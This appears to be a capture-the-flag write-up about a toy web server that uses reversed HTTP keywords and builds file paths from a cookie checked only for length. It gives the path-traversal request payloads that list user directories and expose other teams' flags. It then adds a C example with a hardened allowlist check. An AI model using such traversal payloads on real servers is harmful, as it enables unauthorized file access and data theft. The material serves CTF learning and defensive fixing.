We noticed that the server logs debug info to stdout.
Our first idea was path traversal, because the server stores files under names taken from the request: path = './' + eikooc + '/' + path
Path traversal in the path component didn't work at all, but eikooc
(reversed "cookie") turned out to be a user directory. So we sent this payload:
TEG / PTTH\1.1
eikooc: ../
And we got this log message:
[PID 19] [] TEG SERVER
TEG / PTTH\1.1
eikooc: eikooc: ../
found cookie
[PID 20] [] Fucked up cookie. CLIENT
OK, we checked the condition that produces this message:
if (some_function(some_ptr) == 15)
{
...
} else {
throw_error("Fucked up cookie.");
}
Hmm, it looks like some_function is just strlen and some_ptr is the eikooc pointer.
And finally we sent this payload (with exactly 15 slashes in the eikooc):
TEG / PTTH\1.1
eikooc: ////////////////////
PTTH\0.1 2 KO
eikooc: ///////////////
eicookh: 093edf9115dc3ca072233b96e38f2752
<html><head>
<title>Index of data</title>
</head><body>
<h1>Index of data</h1>
<a href="./">(Parent Directory)</a><br>
<a href="data/MskBs9WDwWdlj1p">MskBs9WDwWdlj1p</a><br>
</body></html>
Got it! This request lists all usernames, and now we can extract all flags the same way the jury does.
Our FB: FAUST_XOlUOAUHYk6BugAAAABMr89BM6YmLUIM
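The root cause this write-up points at is that the cookie is checked by length only (strlen == 15) before being spliced into a filesystem path, so 15 slashes or five "../" pass the check. As an added example (not the challenge's code; the server's real function and variable names are unknown, so the names below are assumed), here is that length-only check reconstructed beside a hardened one that also restricts the cookie to alphanumerics and refuses separators or dot entries in the file name:

```c
/* Added example, not the challenge server's code. The decompiled check in the
 * write-up compares strlen(cookie) against 15; function names here are assumed. */
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define COOKIE_LEN 15   /* the length the decompiled check compares against */

/* Reconstructed check from the write-up: accepts ANY 15 bytes, including
 * "///////////////" and "../../../../../", which is the bug. */
int cookie_ok_length_only(const char *cookie)
{
    return strlen(cookie) == COOKIE_LEN;
}

/* Hardened check: exact length AND every byte from an allowlist, so no '/',
 * '.', '\\' or control byte can ever reach the path concatenation. */
int cookie_ok_strict(const char *cookie)
{
    size_t n = strlen(cookie);
    if (n != COOKIE_LEN)
        return 0;
    for (size_t i = 0; i < n; i++) {
        if (!isalnum((unsigned char)cookie[i]))
            return 0;
    }
    return 1;
}

/* Builds "./<cookie>/<name>" only when both components pass validation.
 * Returns 1 on success; returns 0 and leaves out empty on rejection or truncation. */
int build_user_path(char *out, size_t outlen, const char *cookie, const char *name)
{
    out[0] = '\0';
    if (!cookie_ok_strict(cookie))
        return 0;
    /* the file name may not contain separators or be a dot entry either */
    if (name[0] == '\0' || strpbrk(name, "/\\") != NULL ||
        strcmp(name, ".") == 0 || strcmp(name, "..") == 0)
        return 0;
    int written = snprintf(out, outlen, "./%s/%s", cookie, name);
    if (written < 0 || (size_t)written >= outlen) {
        out[0] = '\0';
        return 0;
    }
    return 1;
}

int main(void)
{
    /* constructed probes: the username seen in the directory listing, the two
     * payload shapes from the write-up, and a too-short value */
    const char *probes[] = { "MskBs9WDwWdlj1p", "///////////////", "../../../../../", "short" };
    char path[128];
    for (size_t i = 0; i < sizeof probes / sizeof probes[0]; i++) {
        int built = build_user_path(path, sizeof path, probes[i], "flag");
        printf("%-17s length-only=%d strict=%d path=%s\n", probes[i],
               cookie_ok_length_only(probes[i]), cookie_ok_strict(probes[i]),
               built ? path : "(rejected)");
    }
    return 0;
}
```

The length-only check lets the 15-slash cookie through exactly as the write-up describes, while the strict check rejects it and anything else that is not a plain 15-character alphanumeric identifier; the listed username MskBs9WDwWdlj1p is itself 15 alphanumerics, so legitimate users still pass.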